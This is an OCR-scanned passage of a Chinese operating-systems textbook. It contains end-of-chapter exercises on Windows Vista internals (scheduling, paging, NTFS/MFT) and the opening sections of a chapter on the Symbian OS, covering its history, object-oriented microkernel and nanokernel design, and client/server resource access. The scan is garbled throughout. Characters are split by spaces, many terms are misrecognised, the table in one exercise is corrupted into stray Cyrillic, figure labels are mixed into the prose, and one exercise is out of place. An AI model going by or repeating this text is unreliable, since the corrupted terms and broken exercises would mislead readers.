题 ， 但 确实 有 必要 认真 考虑 一 番 。 

9. 给 出 三 个 可 能 会 终止 线程 的 原因 。 

10. 如 11.4 节 所 述 ， 有 一 个 特殊 的 句柄 表 用 于 为 进 
程 和 线程 分 配 ID。 句 柄 表 的 算法 通常 是 分 配 第 
一 个 可 用 的 句柄 (按照 后 进 先 出 的 顺序 维护 空 
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闲 链表 ) 。 在 最 新 发 布 的 Windows 版 本 中 ,该 
算法 变 成 了 ID 表 总 是 以 先进 先 出 的 顺序 跟踪 空 
闲 链表 。 使 用 后 进 先 出 顺序 分 配 进程 线 ID 有 什 
么 潜在 的 问题 ? 为 什么 .UX 操作 系统 没有 这 个 
问题 ? 

11. 假设 时 间 片 配额 被 设置 为 20 毫秒 ， 当 前 优先 
级 为 24 的 线程 在 配额 开始 的 时 候 刚 开始 执行 。 
突然 一 个 LO 操作 完成 了 并 且 一 个 优先 级 为 28 
的 线程 变 成 就 绪 状 态 。 这 个 线程 需要 等 待 多 久 
才 可 以 使 用 CPU? 

12. 在 Windows Vista 中 ， 当 前 的 优先 级 总 是 大 于 
或 等 于 基本 的 优先 级 。 是 否 在 某 些 情况 下 当前 
的 优先 级 低 于 基本 的 优先 级 也 是 有 意义 的 ? 若 
有 ， 请 举例 。 否 则 请 说 明 原 因 。 

13. 在 Windows 中 很 容易 实现 一 些 设施 将 运行 在 
内 核 中 的 线程 临时 依附 到 其 他 进程 的 地 址 空 
间 。 为 什么 在 用 户 态 却 很 难 实现 ? 这 样 做 有 
何 目的 ? 

14. 即使 有 很 多 空闲 的 可 用 内 存 而 且 内 存 管理 器 也 
不 需要 调整 工作 集 ， 分 页 系统 仍然 会 经 常 对 磁 
盘 进行 写 操作 。 为 什么 ? 

15. 为 什么 用 来 访问 进程 页 目录 和 页 表 的 物理 页 面 
的 自身 映射 数据 总 是 占用 同一 片 4MB 的 内 核 虚 
拟 地 址 空间 (在 x86 上 ) ? 

16. 如 果 保留 了 一 段 虚拟 地 址 空间 但 是 没有 提交 
它 ， 你 认为 系统 会 为 其 创建 一 个 VAD 吗 ? 请 证 
明 你 的 答案 。 

17. 在 图 11-36 中 ， 哪 些 转移 是 由 策略 决定 的 ， 而 
不 是 由 系统 事件 (例如 ， 一 个 进程 退出 并 释放 
其 页 面 ) 所 强迫 的 转移 ? 

18. 假设 一 个 页 面 被 共享 并 且 同 时 存在 于 两 个 工作 
集中 。 如 果 它 从 一 个 工作 集 移出 ， 在 图 11-36 
中 它 将 会 到 哪里 去 ? 当 它 从 第 二 个 工作 集 移出 
时 会 发 生 什 么 ? 

19. 当 进程 取消 对 一 个 页 面 的 映射 时 ， 干 净 的 页 会 
进行 图 11-36 中 的 转移 (5)， 那 脏 的 栈 页 怎样 
处 理 昵 ?为 什么 上 脏 的 栈 页 面 被 取消 映射 时 不 会 
被 转移 到 已 修改 列表 中 呢 ? 

20. 假设 一 个 代表 某 种 类 型 互 斥 锁 (比如 互 斥 对 象 ) 
的 分 发 对 象 被 标记 为 使 用 通知 事件 而 不 是 同步 
事件 来 声明 锁 被 释放 。 为 什么 这 样 是 不 好 的 ? 
你 的 回答 在 多 大 程度 上 依赖 于 镇 被 持 有 的 时 间 、 
时 间 片 配额 的 长 度 和 系统 是 否 为 多 处 理 器 的 ? 


21. 一 个 文件 存在 如 下 映射 。 请 给 出 MFT 的 行 
ш. 
ШЕ 0 1 2 3 5 6 7 в 9 10 
@а®ш50 51 52 22 24 25 26 53 54 - 60 


22. 考虑 图 11-43 中 的 MFT 记 录 。 假 设 该 文件 增长 
了 并 且 在 文件 的 末尾 添加 了 第 10 个 块 。 新 块 的 
序号 是 66。 现 在 MFT 记 录 会 是 什么 样子 ? 

在 图 11-46b 中 ， 最 先 的 两 个 行 串 的 长 度 都 为 8 

个 块 。 你 觉得 它们 长 度 相等 只 是 偶然 的 ， 还 

是 跟 压缩 的 工作 方式 有 关 ? 请 解释 理由 。 

24. 假如 您 想 创建 Windows Vista 的 精简 版 。 在 图 
11-47 中 可 以 取消 哪些 字段 而 不 削弱 系统 的 安 
全 性 ? 

25. 由 许多 程序 (Web 浏 览 器 、Office、COM 服务 
器 ) 使 用 的 一 个 扩展 模型 是 对 程序 所 包含 的 
DLL 添加 钩子 函数 来 扩展 其 底层 功能 。 只 要 在 
加 载 DLL 前 仔细 模拟 客户 的 身份 ， 该 模型 对 基 
于 RPC 的 服务 来 说 就 是 合理 的 ， 是 这 样 的 吗 ? 
为 什么 不 是 ? 

26. 在 NUMA 机 器 上 ， 不 管 何 时 Windows 内 在 管理 
器 需要 分 配 物 理 内 存 来 处 理 页 面 失效 ， 它 总 尝 
试 从 当前 线程 的 理想 的 处 理 器 的 NUMA 节 点 中 
获取 。 为 什么 ?》 如 果 线程 正 运行 在 其 他 处 理 器 
上 呢 ? 

27. 系统 崩溃 时 ， 应 用 程序 可 以 轻易 地 从 基于 卷 的 
影子 副本 的 备份 中 恢复 ， 而 不 是 从 磁盘 状态 中 
恢复 。 请 给 出 几 个 这 样 的 例子 。 

28. 在 某 些 情况 下 为 了 满足 安全 性 的 要 求 需 要 为 进 

程 提供 全 零 的 页 面 ， 在 11.9 节 中 向 进程 的 堆 提 

供 内 存 就 是 这 样 的 一 种 情况 。 请 给 出 一 个 或 者 

多 个 其 他 需要 对 页 面 清 零 的 虚拟 内 存 操作 。 

.在 当前 所 有 的 Windows 发 行 版 本 中 ，regedit 

命令 可 用 于 导出 部 分 或 全 部 注册 表 到 一 个 文本 

文件 。 在 一 次 工作 会 话 中 保存 注册 表 若 干 次 ， 

看 看 有 什么 变化 。 如 果 您 能 够 在 Windows 中 安 

装 软件 或 硬件 ， 请 找 出 安装 或 纯 载 程序 或 设备 

时 注册 表 有 何 变化 。 

30. 写 一 个 UNIX 程 序 ， 模 拟 用 多 个 流 来 写 一 个 
NTFS 文 件 。 它 应 能 接受 一 个 或 多 个 文件 作为 
参数 ， 并 创建 一 个 输出 文件 ， 该 文件 的 一 个 流 
包含 所 有 参数 的 属性 ， 其 他 的 流 包含 每 个 参数 
的 内 容 。 然 后 再 写 一 个 程序 来 报告 这 些 属 性 和 
流 并 提取 出 所 有 的 组 成 成 分 。 


23. 


名 


2 


® 


第 12 章 实例 研究 3: Symbian 操作 系统 


在 前 面 的 两 章 里 ,我们 已 经 介绍 了 两 种 在 台式 机 以 及 笔记 本 电脑 上 通用 的 操作 系统 ，Linux 以 及 
Windows Vista。 但 实际 上 ， 超 过 90% 的 CPU 都 并 非 用 于 台式 机 或 笔记 本 电脑 ， 而 是 用 于 做 入 式 系统 ， 例 
如 手机 、PDA、 数 码 相机 、 便 携 式 摄像 机 、 游 戏 机 、iPod、MP3 播 放 器 、CD 播 放 器 、DVD 刻 录 机 、 无 
线路 由 器 、 电 视 机 、GPS 接 收 器 、 激 光 打 印 机 、 汽 车 ， 以 及 其 他 许多 消费 产品 。 它 们 大 多 使 用 现代 的 32 
位 或 64 位 芯片 ， 几 平 全 部 安装 有 成 熟 的 操作 系统 。 但 是 很 少 有 人 意识 到 这 些 操作 系统 的 存在 。 在 这 一 章 
里 ， 我 们 将 研究 戏 入 式 系统 中 十 分 通用 的 一 个 操作 系统 : Symbian 操作 系统 。 

Symbian 操作 系统 是 一 个 运行 在 一 些 厂商 的 智能 手机 平台 上 的 操作 系统 。 智 能 手机 因 其 运行 功能 齐 
全 的 操作 系统 以 及 利用 台式 机 的 特性 而 得 名 。Symbian 操 作 系统 用 来 作为 很 多 厂商 的 多 种 智能 手机 的 基 
础 ， 通 过 精心 设计 ， 专 门 运行 在 智能 手机 平台 上 ， 即 那些 CPU、 内 存 以 及 存储 容量 有 限 、 主 要 针对 通信 
的 通用 计算 机 。 

针对 Symbian 操作 系统 的 探讨 将 从 它 的 历史 开始 。 随 后 给 出 这 个 系统 的 概况 ， 大 致 介绍 它 是 怎样 设计 
的 以 及 实现 什么 样 的 功能 。 然 后 如 前 两 章 那样 ， 介 绍 Symbian 操作 系统 设计 的 各 个 方面 ， 包 括 进 程 、 内 存 
管理 、UO、 文 件 系统 以 及 安全 性 。 最 后 介绍 Symbian 操作 系统 怎样 处 理智 能 手机 中 的 通信 问题 。 


12.1 Symbian 操作 系统 的 历史 
UNIX 操 作 系统 有 着 很 长 的 历史 ， 几 乎 与 计算 机 一 样 的 久远 。Windows 操 作 系统 也 有 较 长 的 历史 。 
而 Symbian 操作 系统 的 历史 相对 较 短 。 它 起 源 于 20 世 纪 90 年 代 研发 的 操作 系统 ， 首 次 出 现 则 是 在 2001 年 。 
鉴于 Symbian 操作 系统 所 依赖 的 智能 手机 平台 也 是 近期 才 得 到 发 展 的 ， 这 一 点 应 当 并 不 令 人 惊讶 。 
Symbian 操作 系统 起 源 于 掌上 设备 ， 随 后 经 历 了 几 个 版 本 的 升级 得 到 快速 发 展 。 


12.1.1 Symbian 操作 系统 的 起 源 ，Psion 和 EPOC 

Symbian 操作 系统 继承 于 某 些 最 初 的 掌上 设备 。20 世 纪 80 年 代 未 ， 作 为 将 台式 设备 的 功能 整合 到 小 
型 的 可 移动 装置 中 的 一 个 手段 ， 掌 上 设备 得 到 发 展 。 对 人 掌上 电脑 的 初次 尝试 并 没有 引起 太 多 的 注意 。 
Apple Newton 是 一 个 设计 良好 的 掌上 电脑 设备 ， 但 只 在 少数 使 用 者 中 间 流 行 。 虽 然 开始 很 缓慢 ， 但 20 世 
纪 90 年 代 中 期 发 展 的 掌上 电脑 则 已 经 针对 用 户 以 及 人 们 使 用 移动 设备 的 方式 进行 了 更 好 的 修改 。 掌 上 电 
脑 最 初 设计 为 PDA， 是 电子 规划 员 的 个 人 数码 助手 ， 不 断 地 发 展 并 具有 了 多 种 功能 。 随 着 它们 的 发 展 ， 
在 功能 上 已 经 趋向 于 台式 机 ， 也 相应 地 有 了 与 台式 机 同样 的 需求 。 它 们 需要 多 任务 的 处 理 方式 ， 需要 增 
加 多 种 形式 的 存储 能 力 :需要 在 输入 输出 上 更 加 灵活 。 

掌上 设备 也 逐 源 包含 了 通信 功能 。 随 着 个 人 设备 的 发 展 ， 个 人 通信 也 同样 在 发 展 着 。 移 动 电话 的 使 
用 在 20 世 纪 90 年 代 末期 有 了 飞速 的 发 展 。 因 此 ， 将 掌上 设备 与 移动 电话 相 结合 形成 智能 手机 是 一 件 很 自 
然 的 事情 。 而 随 着 这 种 合并 的 产生 ， 在 掌上 设备 里 运行 的 操作 系统 也 不 得 不 发 展 。 

在 20 世 纪 90 年 代 ，Psion 电 脑 公司 制造 了 PDA 设 备 。1991 年 ，Psion 生 产 了 Series 3 个 配 有 小 尺 
二 音色 显示 屏 的 小 型 电脑 ， 小 到 可 以 放 入 口袋 中 。 在 Series 3 之 后 ，1996 年 又 制造 了 具有 红外 功能 的 
Series 3c，1998 年 又 生产 了 具有 更 快 处 理 器 速度 以 及 更 多 内 存 容量 的 Series 3mx。 它 们 各 自 均 获 得 了 成 
功 ， 而 它们 的 成 功 主要 源 自 其 良好 的 功 耗 管理 以 及 与 包括 个 人 电脑 和 掌上 设备 在 内 的 其 他 设备 之 间 的 互 
通 性 。 程 序 是 用 C 语 言 实现 的 ， 利 用 面向 对 象 设计 ， 并 采用 了 “应 用 引 学 ”一 一 Symbian 操 作 系 统 发 展 
中 的 一 个 重要 部 分 。 这 种 引擎 方案 功能 强大 。 它 借鉴 了 微 内 核 的 设计 ， 从 而 强调 类 似 于 服务 器 般 的 引擎 
的 功能 性 一 一 通过 回应 来 自 各 应 用 程序 的 请 求 进行 功能 管理 。 这 种 方式 使 得 它 可 以 拥有 标准 化 的 APII 
及 利用 对 象 的 抽象 来 使 得 应 用 程序 编程 者 免 于 诸如 数据 格式 等 令 人 麻烦 的 细节 问题 。 

1996 年 ，Psion 开 始 设计 一 种 新 型 的 32 位 操作 系统 ， 它 支持 触摸 屏 上 的 定位 设备 ， 采 用 多 媒体 技术 ， 
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并 且 具 有 更 丰富 的 通信 功能 。 这 个 新 的 系统 同时 也 更 加 面向 对 象 ， 并 且 可 以 移植 到 不 同 的 体系 结构 和 设 
备 设计 上 。Psion 的 付出 所 得 到 的 结果 是 系统 EPOC 版 本 1 的 推出 。EPOC 由 C++ 编程 实现 ， 并 且 是 彻底 的 
面向 对 象 的 设计 。 它 依然 使 用 了 引擎 方案 ， 并 将 这 个 设计 理念 扩展 到 协同 访问 系统 服务 和 外 部 设备 的 一 
系列 服务 器 。EPOC 扩 展 了 通信 能 力 ， 开 发 了 多 媒体 ， 引 入 了 新 的 针对 触摸 屏 等 接口 的 平台 ， 并 通用 化 
了 硬件 接口 。 

之 后 EPOC 又 继续 发 展 了 两 个 版 本 ，EPOC 版 本 3 (ЕВЗ) 和 EPOC 版 本 5 (ER5)。 它 们 在 新 的 Psion 
Series 5 及 Series 7 的 电脑 平台 上 运行 。 

Psion 同 时 也 试图 强调 它 的 操作 系统 可 以 适用 于 其 他 硬件 平台 。 在 2000 年 左右 ， 新 的 掌上 设备 发 展 
的 最 大 机 会 在 手机 业务 ， 而 在 这 方面 ， 众 多 厂商 一 直 都 在 为 它 的 下 一 代 设 备 寻找 一 个 新 的 先进 的 操作 系 
统 。 为 了 利用 这 些 机 会 ，Psion 与 手机 业 的 巨头 ， 包 括 Nokia、Ericsson、Motorola 以 及 Matsushita 
(Panasonic) ， 成 立 了 一 个 合资 项 目 Symbian， 用 来 控制 EPOC 操 作 系 统 核心 的 所 有 权 并 使 其 继续 发 展 。 
这 一 新 的 内 核 设计 现在 称 为 Symbian 操作 系统 


12.1.2 Symbian 操作 系统 版 本 6 

鉴于 EPOC 的 最 后 一 个 版 本 为 ER5， 因 此 Symbian 操作 系统 在 2001 年 以 版 本 6 首发 。 它 利用 了 EPOC 
的 灵活 特性 ， 并 主要 面向 几 个 不 同 的 通用 平台 。 其 设计 非常 灵活 ， 从 而 满足 了 发 展 各 种 高 级 移动 设备 以 
及 手机 的 需要 ， 同 时 允许 众多 厂商 具有 区 别 各 自 产品 的 能 力 。 

同时 ，Symbian 操 作 系统 将 会 积极 采用 现代 最 先进 的 、 成 熟 的 关键 技术 。 这 更 强化 了 对 于 面向 对 象 
以 及 客户 机 -服务 器 结构 的 选择 ， 正 如 它们 在 台式 机 以 及 网 络 世界 的 愈加 广泛 的 使 用 。 

Symbian 操作 系统 版 本 6 被 它 的 设计 者 们 称 为 “开放 的 "。 这 个 “开放 ”不 同 于 UNIX 以 及 Linux 那 样 
的 开源 特性 。 这 里 ,“ 开 放 ” 指 的 是 这 个 操作 系统 的 结构 是 公开 的 并 且 是 大 家 均 可 获得 的 。 另 外 ， 所 有 
的 系统 接口 也 都 公开 ， 从 而 鼓励 第 三 方 软件 的 开发 。 

12.1.3 Symbian 操作 系统 版 本 7 

Symbian 操作 系统 版 本 6 在 设计 和 功能 上 很 像 EPOC 以 及 版 本 6 以 前 的 版 本 。 它 的 设计 主要 着 腿 于 移 
动 电话 。 此 后 ， 随 着 越 来 越 多 的 厂商 设计 了 移动 电话 ， 即 使 是 EPOC 的 灵活 性 也 不 能 够 应 付 如 此 众多 的 
移动 电话 对 Symbian 操作 系统 的 使 用 需求 。 

Symbian 操作 系统 版 本 7 保持 了 EPOC 的 台式 机 功能 ， 但 是 大 部 分 系统 内 部 被 重 写 了 以 包含 多 种 智能 
手机 功能 。 操 作 系统 内 核 以 及 操作 系统 服务 从 用 户 界面 中 分 离 出 来 。 相 同 的 操作 系统 现在 可 以 在 众多 不 
同 的 智能 手机 平台 上 运行 了 ， 它 们 各 自 拥有 着 不 同 的 用 户 界面 系统 。Symbian 操 作 系 统 现在 可 以 扩展 以 
处 理 新 的 不 可 预期 的 信息 格式 或 者 用 在 使 用 不 同 的 电话 技术 的 智能 手机 上 。Symbian 操 作 系统 版 本 7 发 布 
于 2003 年 。 


12.14 今天 的 Symbian 操作 系统 

Symbian 操作 系统 版 本 7 是 一 个 重要 的 版 本 ， 因 为 它 将 抽象 性 以 及 灵活 性 带 入 了 操作 系统 。 然 而 ， 
这 种 抽象 是 有 代价 的 。 操 作 系统 的 性 能 不 久 便 成 为 一 个 需要 解决 的 问题 。 

于 是 重 写 操作 系统 的 工程 又 开始 了 ， 这 次 主要 着 眼 于 性 能 。 这 个 新 的 操作 系统 设计 和 旨 在 保持 
Symbian 操作 系统 版 本 7 的 灵活 性 的 同时 提高 其 性 能 ， 并 增强 其 安全 性 。Symbian 操 作 系统 版 本 8， 发 布 
于 2004 年 ， 提 高 了 Symbian 操作 系统 的 性 能 ， 尤 其 是 在 其 实时 功能 上 。Symbian 操 作 系统 版 本 9 发 布 于 
2005 年 ， 增 加 了 基于 性 能 的 安全 以 及 看 门 机 制 安装 的 概念 。 如 同 Symbian 操作 系统 版 本 7 增加 软件 的 灵活 
性 那样 ，Symbian 操 作 系统 版 本 9 增加 了 针对 硬件 的 灵活 性 。 一 个 新 的 二 进 制 模型 得 到 了 开发 ， 从 而 使 
得 硬件 开发 者 可 以 使 用 Symbian 操作 系统 ， 而 不 必 有 重新 设计 硬件 使 其 适应 某 一 特定 的 结构 模型。 

12.2 Symbian 操作 系统 概述 

前 一 节 介 绍 过 ，Symbian 操 作 系统 是 由 一 个 掌上 设备 操作 系统 发 展 成 为 一 个 以 实时 性 能 作为 目标 的 
用 在 智能 手机 平台 上 的 操作 系统 。 这 一 节 里 我 们 将 对 Symbian 操作 系统 设计 中 区 含 的 概念 作 简单 的 介绍 。 
这 些 概念 与 如 何 使 用 这 个 操作 系统 息息相关 。 

Symbian 是 一 个 独特 的 操作 系统 ， 因 为 它 是 以 智能 手机 作为 目标 平台 的 。 它 不 是 将 一 般 的 操作 系统 
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硬 装 人 智能 手机 (有 很 大 的 难度 )， 也 不 是 使 较 大 的 操作 系统 适应 于 较 小 的 平台 。 然 而 ， 它 确实 包含 了 
许多 其 他 大 型 操作 系统 所 具有 的 特性 ， 从 多 任务 到 内 存 管理 再 到 安全 问题 。 

Symbian 操作 系统 继承 了 其 前 身 的 最 佳 的 特性 ， 具 有 由 EPOC 传 承 下 来 的 面向 对 象 特性 。 并 且 如 版 
本 6 中 所 引入 的 ， 使 用 了 微 内 核 的 设计 方案 ， 最 小 化 了 内 核 的 开销 ， 将 不 必要 的 功能 移 到 了 用 户 层 进程 。 
它 模仿 EPOC 中 应 用 的 引擎 模 型 ， 使 用 了 客户 机 /服务 器 结构 。 它 支持 多 种 台式 机 功能 ， 包 括 多 任务 和 多 
线程 ， 以 及 可 扩展 存储 系统 。 它 还 继承 了 EPOC 中 强调 的 多 媒体 与 通信 。 


12.2.1 面向 对 象 

面向 对 象 是 一 个 意味 着 抽象 的 术语 。 在 一 个 面向 对 象 的 设计 中 ， 针 对 某 个 系统 成 分 的 数据 和 功能 ， 
建立 一 个 抽象 的 实体 ， 称 为 对 象 。 一 个 对 象 提供 了 具体 的 数据 以 及 功能 ， 但 隐藏 了 具体 实现 。 一 个 合理 
实现 的 对 象 可 以 被 移 除 并 被 另外 一 个 不 同 的 对 象 代替 ， 只 要 系统 其 他 部 分 对 这 个 对 象 的 使 用 (也 即 其 接 
口 ) 保持 不 变 。 

当面 向 对 象 应 用 到 操作 系统 设计 中 时 ， 就 意味 着 所 有 的 系统 调用 以 及 内 核 端 功 能 的 使 用 均 要 通过 接 
口 ， 而 不 能 直接 获取 实际 数据 或 依靠 其 他 类 型 的 实现 。 一 个 面向 对 象 的 内 核 的 实现 通过 对 象 来 提供 内 核 
功能 。 使 用 内 核 端 对 象 通常 意味 着 一 个 应 用 程序 具有 一 个 对 象 的 如 柄 ， 也 就 是 对 对 象 的 一 个 引用 ， 然 后 
通过 这 个 句柄 来 获得 对 该 对 象 接口 的 访问 。 

Symbian 操作 系统 采用 了 面向 对 象 的 设计 。 系 统 功能 的 实现 是 隐藏 的 ， 系 统 数据 的 使 用 通过 系统 对 
象 已 定义 的 接口 完成 。 在 Linux 等 操作 系统 中 ， 构 建 一 个 文件 描述 符 ， 并 将 这 个 描述 符 作为 open 调 用 的 
参数 ， 而 在 Symbian 操作 系统 中 则 会 创建 一 个 文件 对 象 ， 然 后 调用 该 对 象 的 open 方 法 。 举 例 来 说 ， 在 
Linux 操 作 系统 中 ， 正 如 大 家 所 知道 的 ， 文 件 描述 符 对 应 于 系统 内 存 中 文件 描述 符 表 的 索引 的 整数 表 
示 ， 而 在 Symbian 操作 系统 中 ， 文 件 系统 表 的 实现 是 未 知 的 ， 而 所 有 的 文件 操作 是 通过 一 个 特定 的 文件 
类 的 对 象 来 实现 的 。 

需要 注意 的 是 Symbian 操作 系统 与 其 他 在 设计 中 运用 了 面向 对 象 理念 的 操作 系统 不 同 。 例 如 ， 许 多 
操作 系统 设计 使 用 了 抽象 数据 类 型 ， 人 们 其 至 可 以 说 系统 调用 整个 理念 就 是 通过 将 系统 实现 细节 对 用 户 
程序 隐藏 起 来 而 实现 了 抽象 。 而 对 于 Symbian 操作 系统 ， 整 个 操作 系统 的 结构 均 是 面向 对 象 设计 的 。 操 
作 系 统 功能 以 及 系统 调用 都 是 与 系统 对 象 相 联系 的 。 资 源 分 配 以 及 保护 则 是 对 应 于 对 象 的 分 配 ， 而 不 是 
系统 调用 的 实现 。 

12.2.2 微 内 核 设计 

具有 面向 对 象 内 在 特性 的 Symbian 操作 系统 的 内 核 结构 是 微 内 核 设计 。 内 核 中 包括 最 小 限度 的 系统 功 
能 以 及 数据 ， 许 多 系统 功能 被 放 到 了 用 户 空间 服务 器 端 。 服 务 器 端 通过 获得 系统 对 象 的 句柄 并 对 这 些 对 象 
进行 必要 的 系统 调用 来 完成 各 自 的 服务 。 用 户 空间 应 用 程序 与 这 些 服务 器 端 进行 交互 而 不 是 采取 系统 调用 。 

典型 的 基于 微 内 核 的 操作 系统 初始 化 引导 时 占用 较 少 的 内 存 ， 并 且 其 结构 也 更 加 动态 。 当 需要 时 可 
以 启动 服务 器 ， 而 在 启动 时 并 不 需要 全 部 的 服务 器 。 微 内 核 大 多 为 可 插 拔 结构 ， 人 允许 当 需 要 时 加 载 系统 
模块 并 插入 到 内 核 中 。 因 此 ， 微 内 核 结构 十 分 灵活 : 支持 新 功能 的 代码 (例如 ， 新 硬件 驱动 程序 ) 可 以 
随时 加 载 和 插入 。 

Symbian 操作 系统 被 设计 为 基于 微 内 核 的 操作 系统 。 通 过 打开 与 资源 服务 器 端的 连接 访问 系统 资源 ， 
资源 服务 器 随后 协同 访问 资源 本 身 。Symbian 操 作 系统 支持 对 于 新 的 实现 的 可 插 拔 结构 。 对 于 系统 功能 
的 新 的 实现 可 以 设计 为 系统 对 象 ， 并 动态 插入 到 内 核 中 。 例 如 ， 可 以 实现 新 的 文件 系统 并 且 在 操作 系统 
运行 的 同时 添加 到 内 核 中 。 

这 种 微 内 核 的 设计 也 带 来 了 一 些 需 要 探讨 的 话题 。 在 传统 的 操作 系统 中 一 个 系统 调用 便 已 足够 时 ， 
微 内 核 使 用 消息 传递 。 性 能 可 能 会 由 于 对 象 间 通信 所 增加 的 花费 而 受到 影响 。 在 传统 操作 系统 中 位 于 内 
核 的 那些 功能 被 移 到 用 户 空间 时 效率 可 能 会 降低 。 举 例 来 说 ， 与 可 以 直接 访问 内 核 数据 结构 的 Windows 
内 核 中 的 进程 调度 相 比 ， 进 程 调度 的 多 函数 调用 的 开销 降低 了 性 能 。 由 于 在 用 户 空间 与 内 核 空间 对 象 中 
传递 消息 ， 会 经 常 发 生 特权 级 切换 ， 这 就 更 降低 了 它 的 性 能 。 最 后 ， 在 传统 设计 方案 中 只 用 到 了 一 个 地 
址 空间 的 系统 调用 ， 而 这 种 消息 传递 以 及 优先 级 转换 意味 着 至 少 需要 用 到 两 个 地 址 空间 来 完成 一 个 微 内 
核 服务 请 求 。 
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这 些 性 能 问题 使 得 Symbian 操 作 系 统 (以 及 其 他 基于 微 内 核 的 操作 系统 ) 的 设计 者 们 对 于 设计 以 及 
实现 细节 给 予 了 极 大 关注 。 设 计 的 重点 是 最 小 化 的 、 紧 凑 的 集中 服务 。 


12.2.3 Symbian 操作 系统 纳 核 

Symbian 操作 系统 的 设计 者 们 在 操作 系统 设计 的 核心 采用 了 一 种 纳 核 的 结构 来 处 理 微 内 核 所 具有 的 
问题 。 正 如 在 微 内 核 结构 中 ， 某 些 系 统 功能 被 移 到 了 用 户 空间 服务 器 端 ， Symbian 操 作 系统 将 需要 复杂 
实现 的 功能 分 离 到 内 核 中 ， 而 只 将 最 基本 的 功能 放 在 系统 核心 的 纳 核 中 。 

在 Symbian 操作 系统 中 ， 纳 核 提供 部 分 最 基本 的 功能 。 在 纳 核 中 ， 运 行 在 特权 级 别 的 简单 线程 完成 
着 十 分 初级 的 功能 。 在 这 一 层 的 实现 中 包括 调度 同步 操作 、 中 断 处 理 和 同步 对 象 ， 如 互 斥 变 量 以 及 信号 
基 。 这 一 层 中 的 实现 功能 大 多 是 可 抢占 的 ， 而 且 是 非常 初级 的 (所 以 它们 可 以 很 快 )。 例 如 ， 动 态 内 存 
分 配对 于 纳 核 就 是 过 于 复杂 的 功能 。 

这 种 纳 核 的 设计 需要 一 个 二 级 层次 来 实现 
较为 复杂 的 内 核 功 能 。Symbian 操 作 系 统 内 核 层 


提供 了 操作 系统 所 需要 的 其 他 较为 复杂 的 内 核 >” рь 

功能 。 每 个 在 Symbian 操作 系统 内 核 层 的 操作 都 

是 特权 级 的 操作 ， 并 与 纳 核 层 的 初级 操作 一 起 srl j 多 媒体 
来 完成 更 加 复杂 的 内 核 工作 。 复 杂 的 对 象 服务 、 

用 户 态 线程 、 进 程 调度 以 及 上 下 文 切换 、 动 态 RERAN 

内 存 、 动 态 库 加 载 、 复 杂 的 同步 、 对 象 及 进程 Rs 

间 通 信 只 是 在 这 层 实现 的 部 分 操作 。 这 层 是 完 

全 可 抢占 式 的 ， 并 且 中 断 可 以 使 其 对 任何 一 部 M SEMBE 

分 的 执行 进行 重新 调度 ， 即 使 是 在 上 下 文 转换 121 Symbian 操 作 系统 内 核 结构 具有 多 县 


的 过 程 中 也 可 以 。 
图 12-1 展 示 了 一 个 完整 的 Symbian 操作 系统 内 核 的 结构 。 


12.2.4 客户 机 /服务 器 资源 访问 

正如 我 们 所 提 到 的 那样 ，Symbian 操 作 系 统 使 用 微 内 核 设计 并 使 用 客户 机 /服务 器 模型 来 访问 系统 资 
源 。 需 要 访问 系统 资源 的 应 用 是 客户 端 ， 操 作 系统 中 运行 着 的 用 来 协调 资源 访问 的 程序 是 服务 器 端 。 在 
Linux 中 ， 人 们 可 能 需要 调用 open 来 打开 一 个 文件 ， 在 Windows 中 ， 需 要 利用 Microsoft API 来 创建 一 个 
窗口 ， 而 在 Symbian 操作 系统 中 的 过 程 均 是 相同 的 : 首先 建立 一 个 到 服务 器 端的 连接 ， 服 务 器 端 需 要 确 
认 这 个 连接 ， 然 后 对 服务 器 端 发 出 实现 某 个 操作 的 请 求 。 因 此 打开 一 个 文件 表示 找到 文件 服务 器 端 ， 调 
用 connect 建 立 与 服务 器 端的 连接 ， 然 后 发 送 给 服务 器 端 一 个 附 有 某 特定 文件 名 字 的 open 请 求 。 

这 样 做 对 于 保护 资源 有 着 几 点 好 处 。 首 先 ， 它 符合 操作 系统 的 面向 对 象 以 及 微 内 核 的 设计 。 其 次 ， 
这 种 结构 对 于 管理 多 任务 、 多 线程 系统 中 所 需要 的 资源 多 重 访问 十 分 有 效 。 最 后 ， 每 个 服务 器 都 可 以 专 
注 于 它 必须 管理 的 资源 ， 并 能 方便 地 进行 升级 以 及 替换 为 新 的 设计 。 


12.2.5 较 大 型 操作 系统 的 特点 

尽管 Symbian 操作 系统 所 针对 的 目标 电脑 规模 较 小 ， 但 它 有 着 许多 大 型 系统 的 特点 。 你 可 以 在 
Symbian 操作 系统 上 找到 大 型 操作 系统 (如 Linux 以 及 Windows) 的 各 种 特性 ， 只 是 以 另 一 种 形式 出 现 。 
Symbian 操作 系统 与 较 大 型 的 操作 系统 有 一 些 共 同 的 特性 。 

“进程 与 线 醛 : Symbian 操作 系统 是 一 个 多 任务 多 线程 的 操作 系统 。 许 多 进程 可 以 同时 运行 ， 相 互 

间 可 以 进行 通信 ， 也 可 以 在 各 进程 内 运行 多 个 线程。 

“常见 文件 系统 支持 : Symbian 操作 系统 利用 一 个 文件 系统 模型 来 管理 对 系统 存储 空间 的 访问 ， 正 

如 大 型 操作 系统 一 样 。 它 具有 一 个 与 Windows 兼 容 的 默认 文件 系统 (默认 使 用 FAT-32 文 件 系统 )， 

通过 使 用 插件 式 接口 支持 其 他 文件 系统 。Symbian 操 作 系统 支持 几 种 不 同类 型 的 文件 系统 ， 包 括 

FAT-16、FAT-32、NTFS， 以 及 许多 存储 卡 格式 (例如 JFFS) 。 

+ А: Symbian 操 作 系统 支持 TCP/IP 网 络 以 及 其 他 的 通信 接口 ， 例 如 品行 、 红 外 和 蓝牙 。 
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HAER: 尽管 Symbian 操作 系统 不 使 用 (也 设 有 相应 的 设备 ) 虚拟 内 存 映射 ， 但 它 通过 按 页 管 
理 实现 对 内 存 访问 ， 并 支持 页 的 置换 ， 也 就 是 说 支持 页 面 换 入 ， 但 不 支持 页 面 换 出 。 


12.2.6 通信 与 多 媒体 

Symbian 操作 系统 以 多 种 方式 协助 通信 。 我 们 很 难 简单 地 对 其 进行 概述 而 不 提 及 通信 特点 。 通 信 的 
模型 遵循 面向 对 象 、 微 内 核 以 及 客户 机 /服务 器 结构 。Symbian 操 作 系统 的 通信 结构 是 以 模块 形式 建立 的 ， 
从 而 允许 新 的 通信 机 制 方便 地 接 入 操作 系统 。 从 用 户 层 接口 到 新 的 协议 实现 ， 到 新 的 设备 驱动 ， 模 块 可 
以 实现 任何 功能 。 由 于 这 样 的 微 内 核实 现 ， 可 以 引入 新 的 模块 并 动态 地 加 载 到 系统 操作 中 。 

